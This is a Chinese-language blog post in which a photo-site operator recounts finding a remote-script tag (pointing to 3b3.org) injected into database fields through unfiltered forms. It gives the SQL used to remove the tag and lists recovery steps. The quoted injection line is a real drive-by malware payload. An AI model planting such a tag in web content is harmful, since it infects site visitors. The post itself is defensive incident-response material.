建站學院(LieHuo.Net)訊 前段時間接手了一個圖片網站,發現有很多地方值得改進,于是在程序上加入了很多功能,使用起來很方便。卻因此遭來了競爭對手的白眼,因為我們的網站是集外鏈和瀏覽一起,集免費和收集一體的相冊。
周二起床,按慣例打開網站,卻發現網站突然彈出一個窗口,同時殺毒軟件也跳了出來。我驚恐地發現了一個我不愿意接受的現實:網站掛了!呵呵。馬上叫來程序員,說網站被掛馬了,要立馬清除,考慮到會給瀏覽網站的用戶用戶帶來很多不便,于是一場無聲的戰斗馬上開始了。
我首先打開FTP,發現里面的文件并沒有被修改,一般來說被掛馬的多數是黑客入侵入修改程序文件,在里面置入代碼。但這次怪了,里面文件的修改時間都是以前的沒有改變過。這時候程序員反饋來消息,很有可能是SQL注入。于是我馬上打開SQL數據庫,發現里面,很多字段都被密密麻麻的。
以下為引用的內容: <script src=http://3b3.org/c.js></script> |
代碼,這就是傳說中的SQL注入,呵呵,終于找到原因了,于是用SQL語句批量將這些代碼替換掉。
以下為引用的內容: update bbsmsg set msgmsg=replace(convert(varchar(8000),msgmsg),'<script src=http://3b3.org/c.js></script>','') |
注意,下劃線部分為數據庫表名和字段名,請靈活替換。
雖然說被注入的比較多,但用批量刪除還是沒有費到多少時間。網站重新恢復了正常,但我卻輕松不起來,因為還找不到根本原因在哪里。難道有人知道我的后臺密碼?有人知道我的SQL密碼?還是有人上傳了帶木馬的程序?還是上傳了惡意代碼呢?
經過一番仔細的排查,終于排除了前三種可能,最后發現我們網站的程序,很多發站內信,BBS,還有修改相冊資料的地方都可以發這種腳本語句。真是粗心大意啊,這么低極的錯誤常識也犯了。于是叫程序員把所有這發文本文檔的地方(黑客可利用此上傳惡意代碼)都打上了補丁,堵住處了漏洞,引用很經典的一句臺詞:安全第一。方法其實很簡單就是過濾掉這種腳本就可以了。抬頭望望窗外的車水馬龍,終于可以舒心地呼吸一口早晨的空氣。
感謝CCTV,感謝黑黑客,感謝看貼的你,沒有這次被掛的經歷,也沒有我的成長。謝謝大家。
最后總結出幾條網站被黑后常用的步驟,希望能給大家帶來幫助:
一、發現網站異常后,立馬關掉網站,這樣以免上瀏覽網站的用戶受到影響;
二、查看FTP里的文件的修改時間,看有沒有被更改過,有沒有注入惡意代碼。如果有,請刪除掉;
三、查看數據庫文件,看有沒有字段被注入惡意代碼,有的話則用SQL語句批量刪除;
四、刪除惡意代碼后,一定要檢查問題出在哪里,這一步很重要。是服務器有漏洞,還是程序有問題,找到問題后一定要打上補丁,以免再有類似的事故發生。如果自己不懂程序代碼,這里介紹一個高手程序員的QQ:850268891;
五、保持良好的心態,總結經驗教訓,再接再勵。(文章來自:www.126tu.com)